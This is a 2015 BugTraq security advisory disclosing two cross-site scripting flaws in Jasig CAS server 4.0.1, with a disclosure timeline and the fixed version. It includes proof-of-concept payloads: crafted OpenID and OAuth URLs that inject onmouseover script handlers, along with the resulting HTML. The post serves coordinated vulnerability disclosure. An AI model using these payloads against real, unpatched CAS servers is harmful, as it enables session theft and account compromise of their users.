BugTraq
Jasig CAS server vulnerabilities Sep 21 2015 12:53PM
Antoni Klajn (antoni d klajn pwr edu pl)
Hi,

Jasig CAS server version 4.0.1 is prone to xss vulnerabilities

Timeline:

20.02.2015 - Vendor notified
11.05.2015 - Patches released
21.09.2015 - Bugtraq disclosure

Vulnerable version:

4.0.1

Fixed version:

4.0.2

Vulnerabilities details:

1) XSS in OpenID server

Obtain method:
Paste thi url
https://oauth.example.com/cas/openid/username"[new line]onmouseover="jscode
in OpenID client and try to log in.
space char is not allowed, you can use new line

Example redirection link
https://oauth.example.com/cas/login?openid.assoc_handle=1422619970824-0&
openid.ax.mode=fetch_request&openid.ax.required=email&openid.ax.type.ema
il=http%3A%2F%2Fschema.openid.net%2Fcontact%2Femail&openid.identity=http
s%3A%2F%2Foauth.example.com%2Fcas%2Fopenid%2Fusername%22&openid.mode=che
ckid_setup&openid.return_to=https%3A%2F%2Fclien.example.com%2Faccount%2F
signin%2Fcomplete%2F%3Fnext%3D%252F%26janrain_nonce%3D2015-09-21T11%253A
15%253A10ZiTDjrd%26openid1_claimed_id%3Dhttps%253A%252F%252Foauth.exampl
e.com%252Fcas%252Fopenid%252Fusername%2527&openid.trust_root=https%3A%2F
%2Fclient.example.com%2F

Result
<input type="hidden" id="username" name="username" value="username"
onmouseover="jscode" />

2) XSS in OAuth server

Example link
https://oauth.example.com/cas/oauth2.0/authorize?client_id=<client_id>&r
edirect_uri="onmouseover=alert(1)%20.trusted-domain.com

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus